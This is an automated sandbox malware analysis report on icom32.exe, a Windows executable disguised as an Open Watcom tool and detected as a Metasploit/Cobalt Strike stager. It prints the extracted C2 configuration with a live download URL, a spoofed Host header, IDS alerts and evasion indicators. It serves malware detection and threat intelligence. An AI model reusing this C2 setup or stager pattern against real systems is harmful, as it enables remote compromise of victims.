Loading ...

Play interactive tourEdit tour

Analysis Report icom32.exe

Overview

General Information

Sample Name:icom32.exe
Analysis ID:399805
MD5:d1f66d78808b8cbd18804812f1a457a5
SHA1:c99ee5407d446e9c0647e7749f307762d25e0143
SHA256:7793c2fd34248236e83206fdd01b547436e966bcb6cae21adcbf61550b62daea
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Metasploit Payload
C2 URLs / IPs found in malware configuration
Contains functionality to check if Internet connection is working
Contains functionality to dynamically determine API calls
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Entry point lies outside standard sections
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files

Classification

Startup

  • System is w10x64
  • icom32.exe (PID: 7040 cmdline: 'C:\Users\user\Desktop\icom32.exe' MD5: D1F66D78808B8CBD18804812F1A457A5)
  • cleanup

Malware Configuration

Threatname: Metasploit

{"Headers": "Accept-Encoding: binary\r\nHost: outlook.office.com\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATM)\r\n", "Type": "Metasploit Download", "URL": "http://adsec.pro/ssl/verify.crl"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmpMalware Configuration Extractor: Metasploit {"Headers": "Accept-Encoding: binary\r\nHost: outlook.office.com\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATM)\r\n", "Type": "Metasploit Download", "URL": "http://adsec.pro/ssl/verify.crl"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: icom32.exeVirustotal: Detection: 56%Perma Link
    Source: icom32.exeMetadefender: Detection: 29%Perma Link
    Source: icom32.exeReversingLabs: Detection: 75%
    Source: icom32.exeStatic PE information: 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2032785 ET TROJAN Cobalt Strike Stager Time Check M2 192.168.2.3:49710 -> 172.217.20.14:80
    Source: TrafficSnort IDS: 2032785 ET TROJAN Cobalt Strike Stager Time Check M2 192.168.2.3:49711 -> 172.217.20.14:80
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: http://adsec.pro/ssl/verify.crl
    Contains functionality to check if Internet connection is workingShow sources
    Source: C:\Users\user\Desktop\icom32.exeCode function: 0_2_00401010 WSAStartup,WSAGetLastError,gethostbyname,WSACleanup,htons,socket,WSACleanup,connect,send,recv,closesocket,WSACleanup, google.com0_2_00401010
    Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
    Source: C:\Users\user\Desktop\icom32.exeCode function: 0_2_00401010 WSAStartup,WSAGetLastError,gethostbyname,WSACleanup,htons,socket,WSACleanup,connect,send,recv,closesocket,WSACleanup,0_2_00401010
    Source: unknownDNS traffic detected: queries for: adsec.pro
    Source: icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmpString found in binary or memory: https://adsec.pro/
    Source: icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmpString found in binary or memory: https://adsec.pro/ssl/verify.crl
    Source: icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmpString found in binary or memory: https://adsec.pro/ssl/verify.crlX
    Source: icom32.exe, 00000000.00000002.780513408.000000000046C000.00000004.00000001.sdmpString found in binary or memory: https://adsec.pro/ssl/verify.crle
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: icom32.exe, 00000000.00000002.780379298.0000000000429000.00000004.00000001.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: C:\Users\user\Desktop\icom32.exeCode function: 0_2_007000D70_2_007000D7
    Source: C:\Users\user\Desktop\icom32.exeCode function: 0_2_007000BA0_2_007000BA
    Source: icom32.exe, 00000000.00000000.643920569.0000000000411000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameff_dd.exe8 vs icom32.exe
    Source: icom32.exe, 00000000.00000002.782887537.00000000029A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs icom32.exe
    Source: icom32.exeBinary or memory string: OriginalFilenameff_dd.exe8 vs icom32.exe
    Source: icom32.exeStatic PE information: 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE
    Source: classification engineClassification label: mal80.troj.winEXE@1/0@1/1
    Source: C:\Users\user\Desktop\icom32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\icom32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\icom32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\icom32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: icom32.exeVirustotal: Detection: 56%
    Source: icom32.exeMetadefender: Detection: 29%
    Source: icom32.exeReversingLabs: Detection: 75%
    Source: C:\Users\user\Desktop\icom32.exeCode function: 0_2_004092B0 LoadLibraryA,GetProcAddress,0_2_004092B0
    Source: initial sampleStatic PE information: section where entry point is pointing to: AUTO
    Source: icom32.exeStatic PE information: section name: AUTO
    Source: icom32.exeStatic PE information: section name: DGROUP
    Source: C:\Users\user\Desktop\icom32.exe TID: 7044Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\icom32.exeThread delayed: delay time: 30000Jump to behavior
    Source: icom32.exe, 00000000.00000002.780553808.000000000047C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Users\user\Desktop\icom32.exeCode function: 0_2_004092B0 LoadLibraryA,GetProcAddress,0_2_004092B0
    Source: C:\Users\user\Desktop\icom32.exeCode function: 0_2_004097B0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_004097B0
    Source: C:\Users\user\Desktop\icom32.exeCode function: 0_2_00406600 GetTimeZoneInformation,0_2_00406600
    Source: C:\Users\user\Desktop\icom32.exeCode function: 0_2_00406CE0 GetEnvironmentStringsA,GetVersion,GetModuleFileNameA,GetCommandLineA,GetCommandLineW,GetModuleFileNameA,0_2_00406CE0

    Remote Access Functionality:

    barindex
    Yara detected Metasploit PayloadShow sources
    Source: Yara matchFile source: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsNative API1Path InterceptionPath InterceptionVirtualization/Sandbox Evasion11Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerVirtualization/Sandbox Evasion11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    icom32.exe57%VirustotalBrowse
    icom32.exe30%MetadefenderBrowse
    icom32.exe76%ReversingLabsWin32.Trojan.Tiny

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://adsec.pro/ssl/verify.crl0%Avira URL Cloudsafe
    https://adsec.pro/ssl/verify.crle0%Avira URL Cloudsafe
    https://adsec.pro/0%Avira URL Cloudsafe
    https://adsec.pro/ssl/verify.crlX0%Avira URL Cloudsafe
    http://adsec.pro/ssl/verify.crl0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    adsec.pro
    163.172.159.210
    truetrue
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://adsec.pro/ssl/verify.crltrue
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://adsec.pro/ssl/verify.crlicom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://adsec.pro/ssl/verify.crleicom32.exe, 00000000.00000002.780513408.000000000046C000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://adsec.pro/icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://adsec.pro/ssl/verify.crlXicom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      163.172.159.210
      adsec.proUnited Kingdom
      12876OnlineSASFRtrue

      General Information

      Joe Sandbox Version:32.0.0 Black Diamond
      Analysis ID:399805
      Start date:29.04.2021
      Start time:09:43:59
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 3m 59s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:icom32.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Run name:Run with higher sleep bypass
      Number of analysed new started processes analysed:16
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal80.troj.winEXE@1/0@1/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 91.5% (good quality ratio 81.5%)
      • Quality average: 79%
      • Quality standard deviation: 33.9%
      HCA Information:
      • Successful, ratio: 56%
      • Number of executed functions: 12
      • Number of non-executed functions: 8
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
      • Found application associated with file extension: .exe
      • Stop behavior analysis, all processes terminated
      Warnings:
      Show All
      • Excluded IPs from analysis (whitelisted): 52.113.196.254, 168.61.161.212, 13.107.3.254, 13.107.246.254, 13.64.90.137, 172.217.20.14, 20.82.210.154, 92.122.213.249, 92.122.213.247, 52.155.217.156, 20.54.26.129, 67.27.233.254, 8.248.143.254, 8.248.141.254, 67.27.233.126, 67.26.73.254, 2.20.142.209, 2.20.142.210, 20.82.209.104
      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, s-ring.msedge.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, google.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      OnlineSASFRn6osajjc938.exeGet hashmaliciousBrowse
      • 163.172.32.74
      fo6xVy841Q.rtfGet hashmaliciousBrowse
      • 51.15.139.10
      Payment slip.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      q9TSaoraAu.exeGet hashmaliciousBrowse
      • 163.172.11.80
      ZlBBoxINlE.exeGet hashmaliciousBrowse
      • 163.172.11.80
      lFxNHPHe4v.exeGet hashmaliciousBrowse
      • 163.172.11.80
      shipping doc.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      PI_63455MV_REVISED.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      USD.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      Offer from China.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      Revised SOA.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      PO.0245GT.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      NEW ORDER.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      M.V. OMNI TIGRIS.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      Fox(04-09-15-47-23).xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      Quotation of 210409 from KOSEN-1.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      REMITTANCE_ADVICE_REF0000360261.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
      • 51.15.139.10
      REMITTANCE ADVICE REF0000360261.xlsxGet hashmaliciousBrowse
      • 51.15.139.10

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):5.858901157309694
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.94%
      • Win16/32 Executable Delphi generic (2074/23) 0.02%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • VXD Driver (31/22) 0.00%
      File name:icom32.exe
      File size:62464
      MD5:d1f66d78808b8cbd18804812f1a457a5
      SHA1:c99ee5407d446e9c0647e7749f307762d25e0143
      SHA256:7793c2fd34248236e83206fdd01b547436e966bcb6cae21adcbf61550b62daea
      SHA512:f0eaa9dffc896828dbaa9cca42d6993a5778eb30997804e35ee68ac41ff01218b668c2997456032930bc68fe9565bb3feefa7115de4be7ac7887bdb93cf343a5
      SSDEEP:768:1TrDPve1+1sx5RLyu4mc1MZg1skv2PWvXdMW6:13DPv2+1sx5Rv7+ekvRk
      File Content Preview:MZ......................@...............................................!..L.!This is a Windows NT windowed executable..$.......PE..L...F$R`............................hY............@..........................0....................... .....................

      File Icon

      Icon Hash:93132d27232587c1

      Static PE Info

      General

      Entrypoint:0x405968
      Entrypoint Section:AUTO
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE
      DLL Characteristics:
      Time Stamp:0x60522446 [Wed Mar 17 15:46:14 2021 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:1
      OS Version Minor:11
      File Version Major:1
      File Version Minor:11
      Subsystem Version Major:1
      Subsystem Version Minor:11
      Import Hash:3909bf4a070f081062accde80126238a

      Entrypoint Preview

      Instruction
      jmp 00007FBBEC588678h
      add edx, dword ptr [eax]
      inc eax
      add byte ptr [edi+70h], cl
      outsb
      and byte ptr [edi+61h], dl
      je 00007FBBEC586CF5h
      outsd
      insd
      and byte ptr [ebx+2Fh], al
      inc ebx
      sub ebp, dword ptr [ebx]
      xor esi, dword ptr [edx]
      and byte ptr [edx+75h], dl
      outsb
      sub eax, 656D6954h
      and byte ptr [ebx+79h], dh
      jnc 00007FBBEC586D06h
      insd
      and byte ptr [eax+6Fh], dl
      jc 00007FBBEC586D06h
      imul ebp, dword ptr [edi+6Eh], 6F432073h
      jo 00007FBBEC586D0Bh
      jc 00007FBBEC586CFBh
      push 43282074h
      sub dword ptr [eax], esp
      push ebx
      jns 00007FBBEC586CF4h
      popad
      jnc 00007FBBEC586CF7h
      sub al, 20h
      dec ecx
      outsb
      arpl word ptr [esi], bp
      and byte ptr [ecx], dh
      cmp dword ptr [eax], edi
      cmp byte ptr [32303032h], ch
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      ret
      ret
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      push ecx
      mov ecx, eax
      mov eax, edx
      mov edx, dword ptr [ecx]
      call 00007FBBEC588A59h
      inc dword ptr [ecx+10h]
      pop ecx
      ret
      lea eax, dword ptr [eax+00000000h]
      lea edx, dword ptr [edx+00000000h]
      lea eax, dword ptr [eax+00h]
      push ecx
      push esi
      push edi
      push ebp
      mov esi, eax
      mov eax, dword ptr [eax+10h]
      call dword ptr [0040F518h]
      mov eax, dword ptr [esi+08h]
      mov ecx, dword ptr [eax+0Ch]
      cmp ecx, 01h
      je 00007FBBEC586CA1h
      test ecx, ecx
      jne 00007FBBEC586D17h
      mov dword ptr [eax+0Ch], 00000001h
      mov ebp, dword ptr [esi+0Ch]
      mov eax, dword ptr [esi+08h]

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0xe0000x553.idata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x800
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x110000x700
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      AUTO0x10000xcfa60xd000False0.439584585337data5.85502460574IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .idata0xe0000x5530x600False0.432942708333data4.54022455633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      DGROUP0xf0000x17800xa00False0.397265625PDP-11 UNIX/RT ldp3.81458751198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .reloc0x110000x00x800False0.779296875data6.21951327485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      .rsrc0x120000x00x800False0.31005859375data3.23020644226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_ICON0x120fc0x2e8data
      RT_GROUP_ICON0x123e40x14data
      RT_VERSION0x123f80x2e8data

      Imports

      DLLImport
      KERNEL32.DLLCloseHandle, CreateEventA, CreateFileA, ExitProcess, FlushFileBuffers, FreeEnvironmentStringsA, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetCurrentThreadId, GetEnvironmentStringsA, GetFileType, GetLastError, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetOEMCP, GetProcAddress, GetStdHandle, GetTimeZoneInformation, GetVersion, LoadLibraryA, MultiByteToWideChar, SetConsoleCtrlHandler, SetEnvironmentVariableA, SetEnvironmentVariableW, SetFilePointer, SetStdHandle, SetUnhandledExceptionFilter, Sleep, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, VirtualQuery, WideCharToMultiByte, WriteFile
      USER32.DLLCharUpperA, MessageBoxA
      WS2_32.DLLWSACleanup, WSAGetLastError, WSAStartup, closesocket, connect, gethostbyname, htons, recv, send, socket

      Version Infos

      DescriptionData
      LegalCopyrightPortions Copyright 2002 Sybase, Inc.
      InternalNameff_dd
      FileVersion1.90
      CompanyNameopenwatcom.org
      ProductNameOpen Watcom
      ProductVersion1.90
      FileDescriptionOpen Watcom Dialog Editor
      OriginalFilenameff_dd.exe
      Translation0x0409 0x04b0

      Network Behavior

      Snort IDS Alerts

      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      04/29/21-09:39:47.568436TCP2032785ET TROJAN Cobalt Strike Stager Time Check M24971080192.168.2.3172.217.20.14
      04/29/21-09:39:47.906566TCP2032785ET TROJAN Cobalt Strike Stager Time Check M24971180192.168.2.3172.217.20.14

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Apr 29, 2021 09:45:17.506817102 CEST49751443192.168.2.4163.172.159.210
      Apr 29, 2021 09:45:17.561675072 CEST44349751163.172.159.210192.168.2.4
      Apr 29, 2021 09:45:17.562963009 CEST49751443192.168.2.4163.172.159.210
      Apr 29, 2021 09:45:17.602128983 CEST49751443192.168.2.4163.172.159.210
      Apr 29, 2021 09:45:17.657506943 CEST44349751163.172.159.210192.168.2.4
      Apr 29, 2021 09:45:49.966147900 CEST49751443192.168.2.4163.172.159.210

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Apr 29, 2021 09:44:39.849407911 CEST5802853192.168.2.48.8.8.8
      Apr 29, 2021 09:44:39.898358107 CEST53580288.8.8.8192.168.2.4
      Apr 29, 2021 09:44:40.127150059 CEST5309753192.168.2.48.8.8.8
      Apr 29, 2021 09:44:40.175745010 CEST53530978.8.8.8192.168.2.4
      Apr 29, 2021 09:44:40.238815069 CEST4925753192.168.2.48.8.8.8
      Apr 29, 2021 09:44:40.287410021 CEST53492578.8.8.8192.168.2.4
      Apr 29, 2021 09:44:40.463089943 CEST6238953192.168.2.48.8.8.8
      Apr 29, 2021 09:44:40.511663914 CEST53623898.8.8.8192.168.2.4
      Apr 29, 2021 09:44:42.284430981 CEST4991053192.168.2.48.8.8.8
      Apr 29, 2021 09:44:42.336164951 CEST53499108.8.8.8192.168.2.4
      Apr 29, 2021 09:44:43.230581999 CEST5585453192.168.2.48.8.8.8
      Apr 29, 2021 09:44:43.282201052 CEST53558548.8.8.8192.168.2.4
      Apr 29, 2021 09:44:44.722270012 CEST6454953192.168.2.48.8.8.8
      Apr 29, 2021 09:44:44.771003008 CEST53645498.8.8.8192.168.2.4
      Apr 29, 2021 09:44:46.606694937 CEST6315353192.168.2.48.8.8.8
      Apr 29, 2021 09:44:46.671905994 CEST53631538.8.8.8192.168.2.4
      Apr 29, 2021 09:44:46.782677889 CEST5299153192.168.2.48.8.8.8
      Apr 29, 2021 09:44:46.834234953 CEST53529918.8.8.8192.168.2.4
      Apr 29, 2021 09:44:48.069870949 CEST5370053192.168.2.48.8.8.8
      Apr 29, 2021 09:44:48.120404959 CEST53537008.8.8.8192.168.2.4
      Apr 29, 2021 09:45:05.267213106 CEST5172653192.168.2.48.8.8.8
      Apr 29, 2021 09:45:05.318824053 CEST53517268.8.8.8192.168.2.4
      Apr 29, 2021 09:45:06.322359085 CEST5679453192.168.2.48.8.8.8
      Apr 29, 2021 09:45:06.371273041 CEST53567948.8.8.8192.168.2.4
      Apr 29, 2021 09:45:07.260894060 CEST5653453192.168.2.48.8.8.8
      Apr 29, 2021 09:45:07.309762001 CEST53565348.8.8.8192.168.2.4
      Apr 29, 2021 09:45:08.172406912 CEST5662753192.168.2.48.8.8.8
      Apr 29, 2021 09:45:08.224104881 CEST53566278.8.8.8192.168.2.4
      Apr 29, 2021 09:45:09.299187899 CEST5662153192.168.2.48.8.8.8
      Apr 29, 2021 09:45:09.347901106 CEST53566218.8.8.8192.168.2.4
      Apr 29, 2021 09:45:09.953521967 CEST6311653192.168.2.48.8.8.8
      Apr 29, 2021 09:45:10.002288103 CEST53631168.8.8.8192.168.2.4
      Apr 29, 2021 09:45:10.229990959 CEST6407853192.168.2.48.8.8.8
      Apr 29, 2021 09:45:10.278759956 CEST53640788.8.8.8192.168.2.4
      Apr 29, 2021 09:45:11.293641090 CEST6480153192.168.2.48.8.8.8
      Apr 29, 2021 09:45:11.345155001 CEST53648018.8.8.8192.168.2.4
      Apr 29, 2021 09:45:12.270354033 CEST6172153192.168.2.48.8.8.8
      Apr 29, 2021 09:45:12.319127083 CEST53617218.8.8.8192.168.2.4
      Apr 29, 2021 09:45:13.210309029 CEST5125553192.168.2.48.8.8.8
      Apr 29, 2021 09:45:13.262125969 CEST53512558.8.8.8192.168.2.4
      Apr 29, 2021 09:45:14.089761019 CEST6152253192.168.2.48.8.8.8
      Apr 29, 2021 09:45:14.157269955 CEST53615228.8.8.8192.168.2.4
      Apr 29, 2021 09:45:16.664444923 CEST5233753192.168.2.48.8.8.8
      Apr 29, 2021 09:45:16.713857889 CEST53523378.8.8.8192.168.2.4
      Apr 29, 2021 09:45:16.874193907 CEST5504653192.168.2.48.8.8.8
      Apr 29, 2021 09:45:16.936476946 CEST53550468.8.8.8192.168.2.4
      Apr 29, 2021 09:45:17.269332886 CEST4961253192.168.2.48.8.8.8
      Apr 29, 2021 09:45:17.487935066 CEST53496128.8.8.8192.168.2.4
      Apr 29, 2021 09:45:21.577204943 CEST4928553192.168.2.48.8.8.8
      Apr 29, 2021 09:45:21.629272938 CEST53492858.8.8.8192.168.2.4
      Apr 29, 2021 09:45:22.661989927 CEST5060153192.168.2.48.8.8.8
      Apr 29, 2021 09:45:22.713489056 CEST53506018.8.8.8192.168.2.4
      Apr 29, 2021 09:45:27.527753115 CEST6087553192.168.2.48.8.8.8
      Apr 29, 2021 09:45:27.653892994 CEST53608758.8.8.8192.168.2.4
      Apr 29, 2021 09:45:28.183489084 CEST5644853192.168.2.48.8.8.8
      Apr 29, 2021 09:45:28.302719116 CEST53564488.8.8.8192.168.2.4
      Apr 29, 2021 09:45:28.829015017 CEST5917253192.168.2.48.8.8.8
      Apr 29, 2021 09:45:28.886357069 CEST53591728.8.8.8192.168.2.4
      Apr 29, 2021 09:45:29.120815039 CEST6242053192.168.2.48.8.8.8
      Apr 29, 2021 09:45:29.200084925 CEST53624208.8.8.8192.168.2.4
      Apr 29, 2021 09:45:29.292609930 CEST6057953192.168.2.48.8.8.8
      Apr 29, 2021 09:45:29.341743946 CEST53605798.8.8.8192.168.2.4
      Apr 29, 2021 09:45:29.909874916 CEST5018353192.168.2.48.8.8.8
      Apr 29, 2021 09:45:29.970298052 CEST53501838.8.8.8192.168.2.4
